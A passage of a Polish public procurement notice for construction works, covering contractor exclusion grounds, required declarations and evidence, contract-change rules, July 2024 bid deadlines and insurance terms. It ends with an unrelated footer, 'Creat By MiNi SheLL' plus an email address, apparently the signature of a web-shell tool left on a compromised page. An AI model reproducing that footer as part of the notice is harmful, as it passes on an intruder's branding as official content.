wynikającego z<br/>wcześniejszego zaangażowania tego wykonawcy lub podmiotu, który należy z wykonawcą do tej samej grupy kapitałowej w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, chyba że spowodowane tym zakłócenie<br/>konkurencji może być wyeliminowane w inny sposób niż przez wykluczenie wykonawcy z udziału w postępowaniu o<br/>udzielenie zamówienia (art. 108 ust. 1 pkt 6 Pzp).<br/>2) wobec którego zachodzą podstawy wykluczenia określone w art. 5k rozporządzenia Rady (UE) nr 833/2014 z dnia 31<br/>lipca 2014 r. dotyczącego środków ograniczających w związku z działaniami Rosji destabilizującymi sytuację na Ukrainie<br/>(Dz. Urz. UE nr L 229 z 31.7.2014, str. 1), w brzmieniu nadanym rozporządzeniem Rady (UE) 2022/576 w sprawie zmiany<br/>rozporządzenia (UE) nr 833/2014 dotyczącego środków ograniczających w związku z działaniami Rosji destabilizującymi<br/>sytuację na Ukrainie (Dz. Urz. UE nr L 111 z 8.4.2022, str. 1);<br/>3) wobec którego zachodzą podstawy wykluczenia określone w art. 7 ust 1 ustawy z dnia 13 kwietnia 2022 r. o<br/>szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie<br/>bezpieczeństwa narodowego.<br/>4) Wykluczenie Wykonawcy nastąpi w przypadkach, o których mowa w art. 111 ustawy Pzp.<br/>5) Wykonawca nie podlega wykluczeniu w okolicznościach określonych w art. 108 ust. 1 pkt 1, 2 i 5 lub art. 109 ust. 1 pkt 2-<br/>5 i 7-10 ustawy Pzp, jeżeli udowodni Zamawiającemu, że spełnił łącznie przesłanki określone w art. 110 ust. 2 ustawy Pzp.<br/>6) Zamawiający oceni, czy podjęte przez Wykonawcę czynności, o których mowa w art. 110 ust. 2 ustawy Pzp, są<br/>wystarczające do wykazania jego rzetelności, uwzględniając wagę i szczególne okoliczności czynu Wykonawcy, a jeżeli<br/>uzna, że nie są wystarczające, wykluczy Wykonawcę.<br/>7) Zamawiający może wykluczyć Wykonawcę na każdym etapie postępowania, ofertę Wykonawcy wykluczonego uznaje się<br/>za odrzuconą. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) FORMULARZ<br/>OFERTOWY - Załącznik nr 1 do SWZ.<br/>2) OŚWIADCZENIE o niepodleganiu wykluczeniu i spełnieniu warunków udziału w postępowaniu, o którym mowa w art. 125 ust. 1<br/>ustawy Pzp Załącznik nr 4 do SWZ.<br/>UWAGA! W przypadku podmiotów występujących wspólnie, oświadczenie składa każdy Wykonawca.<br/>3) OŚWIADCZENIE, O KTÓRYM MOWA W ART. 117 ust. 4 ustawy Pzp, z którego wynika, którą część zamówienia wykonają<br/>poszczególni Wykonawcy - w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Załącznik nr 1 do SWZ -<br/>jeżeli dotyczy.<br/>4) OŚWIADCZENIE podmiotu udostępniającego zasoby o braku podstaw do wykluczenia z postępowania na podstawie art. 125 ust.<br/>1 ustawy Pzp. Załącznik nr 1 do SWZ – jeżeli dotyczy.<br/>5) ZOBOWIĄZANIE podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji<br/>danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów. Załącznik nr 5 do SWZ - jeżeli dotyczy.<br/>6) PEŁNOMOCNICTWO lub inny dokument potwierdzający, że oferta została złożona przez osobę upoważnioną do<br/>reprezentowania Wykonawcy - w przypadku, gdy oferta jest składana przez podmioty występujące wspólnie lub gdy oferta została<br/>podpisana przez inną osobę niż umocowana w dokumencie rejestrowym Wykonawcy.<br/>Dokument/-y należy złożyć w formie elektronicznej (tj. w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym)<br/>lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym przez osobę upoważnioną do reprezentowania<br/>odpowiednio Wykonawcy lub Wykonawcy wspólnie ubiegającego się o udzielenie zamówienia i/lub podmiotu udostępniającego<br/>zasoby.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Dokumenty składa Wykonawca, którego oferta została najwyżej oceniona. Zobowiązany jest do złożenia w wyznaczonym terminie<br/>nie krótszym niż 5 dni, aktualnych na dzień złożenia.<br/>1. Podmiotowe środki dowodowe wymagane od wykonawcy na wezwanie obejmują:<br/>1) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a<br/>jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonano co najmniej dwie roboty budowlane o wartości robót co<br/>najmniej 50 000,00 zł brutto każda wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których<br/>roboty te zostały wykonane, oraz załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w<br/>szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy<br/>czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty<br/>budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać<br/>tych dokumentów – inne odpowiednie dokumenty - Załącznik nr 6 do SWZ.<br/>2) oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076), z innym wykonawcą,<br/>który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o<br/>przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty<br/>częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej<br/>grupy kapitałowej – Załącznik nr 7 do SWZ.<br/>3) Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je uzyskać za pomocą bezpłatnych<br/>ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17.02.2005 r o informatyzacji<br/>działalności podmiotów realizujących zadania publiczne, o ile Wykonawca wykazał w oświadczeniu, o którym mowa w art. 125 ust 1<br/>ustawy Pzp, dane umożliwiające dostęp do tych środków - Załącznik nr 4 do SWZ.<br/>2. Jeżeli Wykonawca, którego oferta została wybrana jako najkorzystniejsza, uchyla się od zawarcia umowy w sprawie zamówienia<br/>publicznego, Zamawiający może dokonać ponownego badania i oceny ofert spośród ofert pozostałych w postępowaniu<br/>Wykonawców oraz wybrać najkorzystniejszą ofertę albo unieważnić postępowanie.<br/>3. Jeżeli jest to niezbędne do zapewnienia odpowiedniego przebiegu postępowania o udzielenie zamówienia, Zamawiający może na<br/>każdym etapie postępowania, wezwać Wykonawców do złożenia wszystkich lub niektórych podmiotowych środków dowodowych,<br/>aktualnych na dzień ich złożenia.<br/>4. Jeżeli zajdą uzasadnione podstawy do uznania, że złożone uprzednio podmiotowe środki dowodowe nie są już aktualne.<br/>Zamawiający może na każdym etapie wezwać Wykonawcę do złożenia wszystkich lub niektórych środków dowodowych aktualnych<br/>na dzień ich złożenia.<br/>5. Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które zamawiający posiada, jeżeli<br/>Wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i aktualność.<br/>6. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.<br/>Dokument/-y należy złożyć w formie elektronicznej (tj. w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym)<br/>lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym przez osobę upoważnioną do reprezentowania<br/>odpowiednio Wykonawcy lub Wykonawcy wspólnie ubiegającego się o udzielenie zamówienia i/lub podmiotu udostępniającego<br/>zasoby.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Wykonawca w terminie 14 dni kalendarzowych od daty podpisania umowy, przedłoży Zamawiającemu jeden z poniżej<br/>wskazanych dowodów w celu potwierdzenia spełnienia wymogu zatrudnienia na podstawie stosunku pracy przez<br/>wykonawcę lub podwykonawcę osób wykonujących przedmiotowe roboty budowlane:<br/>a) oświadczenia zatrudnionego pracownika,<br/>b) oświadczenia wykonawcy lub podwykonawcy o zatrudnieniu pracownika na podstawie umowy o pracę,<br/>c) poświadczoną za zgodność z oryginałem kopię umowy o pracę zatrudnionego pracownika,<br/>d) inne dokumenty,<br/>zawierające informacje, w tym dane osobowe, niezbędne do weryfikacji zatrudnienia na podstawie umowy o pracę, w<br/>szczególności imię i nazwisko zatrudnionego pracownika, datę zawarcia umowy o pracę, rodzaj umowy o pracę i zakres<br/>obowiązków pracownika w których wykonawca/podwykonawca dokona stosownej anonimizacji danych osobowych w<br/>zakresie informacji niewymaganych przez Zamawiającego. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w<br/>Rozdziale VIII SWZ (ust. 1 pkt.2) składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia<br/>oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które<br/>roboty wykonają poszczególni wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców<br/>wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wszelkie zmiany umowy wymagają zachowania formy pisemnej – aneksu podpisanego przez obie strony - pod rygorem<br/>nieważności. Zmiany nie mogą naruszać postanowień zawartych w art. 455 ustawy z dnia 11 września 2019 r. Prawo<br/>zamówień publicznych.<br/>2. Zmiana postanowień umowy może nastąpić w następujących przypadkach i zakresie:<br/>1) odnośnie do zmiany terminu realizacji przedmiotu umowy, określonego w § 2 ust. 1 umowy:<br/>a) w przypadku wystąpienia siły wyższej, rozumianej jako nadzwyczajne okoliczności, które są niezależne od Stron, których<br/>nie można było przewidzieć, takie jak m.in.: wojna, stany wyjątkowe, strajki, blokady, działania sił przyrody o charakterze<br/>klęsk żywiołowych, w tym huragany, powodzie, trzęsienia ziemi, pożary, epidemie itp., uniemożliwiającej wykonanie<br/>przedmiotu Umowy zgodnie z jej postanowieniami, termin zostanie wydłużony o czas niezbędny do usunięcia skutków<br/>działania siły wyższej;<br/>b) termin realizacji umowy może ulec zmianie o czas, o jaki wyżej wskazane okoliczności wpłynęły na termin realizacji<br/>umowy przez Wykonawcę to jest uniemożliwiły wykonawcy terminową realizację przedmiotu zamówienia;<br/>c) w okolicznościach opisanych w § 3 ust. 1 pkt 5 umowy, gdy Zamawiający nie wskaże Wykonawcy w terminie 14 dni<br/>kalendarzowych, danych osoby nowo wyznaczonej do pełnienia funkcji Inspektora Nadzoru - termin ten może wówczas zostać przedłużony o liczbę dni stanowiących różnicę między terminem dla Zamawiającego do wskazania osoby nowo<br/>wyznaczonej do pełnienia funkcji Inspektora Nadzoru, a datą faktycznego wskazania tejże osoby,<br/>d) konieczności wykonania robót zamiennych, niezbędnych do prawidłowego wykonania przedmiotu umowy, które nie<br/>zostały przewidziane w specyfikacji warunków zamówienia - termin może ulec zmianie o czas, w jakim wyżej wskazane<br/>okoliczności wpłynęły na termin wykonania umowy przez Wykonawcę, to jest uniemożliwiły Wykonawcy terminową<br/>realizację przedmiotu umowy.<br/>2) zmiany stawki podatku od towarów i usług (VAT); wartość umowy brutto określona w § 6 ust. 1 umowy ulegnie<br/>zmniejszeniu w przypadku obniżenia stawki podatku VAT lub podwyższeniu w przypadku podwyższenia stawki podatku<br/>VAT, przy czym wynagrodzenie netto nie ulegnie zmianie,<br/>3) zmiany przedmiotu umowy, wobec konieczności wykonania robót zamiennych, niezbędnych do prawidłowego wykonania<br/>przedmiotu umowy, które nie zostały przewidziane w specyfikacji warunków zamówienia – w zakresie niezbędnym do<br/>prawidłowego wykonania przedmiotu umowy.<br/>4) zmiany wynagrodzenia Wykonawcy, o którym mowa w § 6 ust. 1 umowy, wobec konieczności wykonania robót<br/>zamiennych, niezbędnych do prawidłowego wykonania przedmiotu umowy, które nie zostały przewidziane w specyfikacji<br/>warunków zamówienia – w zakresie w jakim powyższe roboty zamienne będą miały wpływ na wysokość wynagrodzenia<br/>należnego Wykonawcy, wartość umowy brutto określona w § 6 ust. 1 umowy może ulec podwyższeniu, zgodnie z<br/>poniższymi postanowieniami.<br/>5) Okoliczność, uprawniająca do zmiany postanowień umowy musi być udokumentowana. Wniosek o zmianę postanowienia<br/>umowy strona winna złożyć drugiej stronie w terminie 7 dni, liczonych od powzięcia informacji o wystąpieniu takiej<br/>okoliczności.<br/>6) Okoliczność konieczności wykonania robót zamiennych, niezbędnych do prawidłowego wykonania przedmiotu umowy,<br/>które nie zostały przewidziane w specyfikacji warunków zamówienia, musi być udokumentowana stosownymi protokołami<br/>podpisanymi przez Wykonawcę, Inspektora Nadzoru i Zamawiającego. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-07-26 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma E-zamówienia - https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-d71e911b-ef47-454b-92cf-915bec88d725</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-07-26 08:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-08-24</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamawiający zawiera umowę̨ w sprawie zamówienia publicznego, z uwzględnieniem art. 577 ustawy Pzp, w terminie nie<br/>krótszym niż̇ 5 dni od dnia przesłania zawiadomienia o wyborze najkorzystniejszej oferty, jeżeli zawiadomienie to zostało<br/>przesłane przy użyciu środków komunikacji elektronicznej, albo 10 dni, jeżeli zostało przesłane w inny sposób.<br/>2. Zgodnie z art. 308 ust 3 pkt 1 lit. a), Zamawiający może zawrzeć umowę w sprawie zamówienia publicznego przed<br/>terminem określonym powyżej jeżeli złożona zostanie jedna oferta.<br/>3. Wykonawca będzie zobowiązany do podpisania umowy w miejscu i terminie wskazanym przez Zamawiającego.<br/>4. Wykonawca zobowiązany jest do posiadania ubezpieczenia OC w zakresie odpowiedzialności cywilnej z tytułu<br/>prowadzonej działalności gospodarczej i w zakresie odpowiadającym przedmiotowi niniejszego zamówienia w okresie<br/>obowiązywania umowy, a to na sumę gwarancyjną nie niższą niż 100 000,00 zł (słownie: sto tysięcy złotych). Umowa<br/>ubezpieczenia winna spełniać dodatkowo warunek nie wyższej niż 1000,00 zł ( słownie: tysiąc złotych) franszyzy<br/>redukcyjnej.<br/>5. Wykonawca jest obowiązany dostarczyć kopię polisy ubezpieczeniowej najpóźniej do dnia protokolarnego przekazania<br/>przez Zamawiającego teren budowy. Brak przekazania polisy uprawnia Zamawiającego do wstrzymania się z przekazaniem<br/>terenu budowy z winy Wykonawcy.<br/>6. Wykonawca, po otrzymaniu zawiadomienia o wyborze jego oferty, dostarczy Zamawiającemu pozostałe dane niezbędne<br/>do podpisania umowy oraz ew. wykaz podwykonawców.<br/>7. Osoby reprezentujące Wykonawcę przy podpisywaniu umowy powinny posiadać ze sobą dokumenty potwierdzające ich<br/>umocowanie do podpisania umowy, o ile umocowanie to nie będzie wynikać z dokumentów załączonych do oferty.<br/>8. Jeżeli Wykonawca, którego oferta została wybrana jako najkorzystniejsza, uchyla się od zawarcia umowy w sprawie<br/>zamówienia publicznego lub nie wnosi wymaganego zabezpieczenia należytego wykonania umowy, Zamawiający może<br/>dokonać ponownego badania i oceny ofert spośród ofert pozostałych w postępowaniu Wykonawców oraz wybrać<br/>najkorzystniejszą ofertę albo unieważnić postępowanie.<br/>9. W przypadku wyboru oferty złożonej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>Zamawiający może żądać przed zawarciem umowy przedstawienia umowy regulującej współpracę tych Wykonawców.<br/>Umowa taka winna określać strony umowy, cel działania, sposób współdziałania, zakres prac przewidzianych do wykonania<br/>każdemu z nich, solidarną odpowiedzialność za wykonanie zamówienia, oznaczenie czasu trwania konsorcjum<br/>(obejmującego okres realizacji przedmiotu zamówienia, gwarancji i rękojmi), wykluczenie możliwości wypowiedzenia umowy konsorcjum przez któregokolwiek z jego członków do czasu wykonania zamówienia.

Creat By MiNi SheLL
Email: jattceo@gmail.com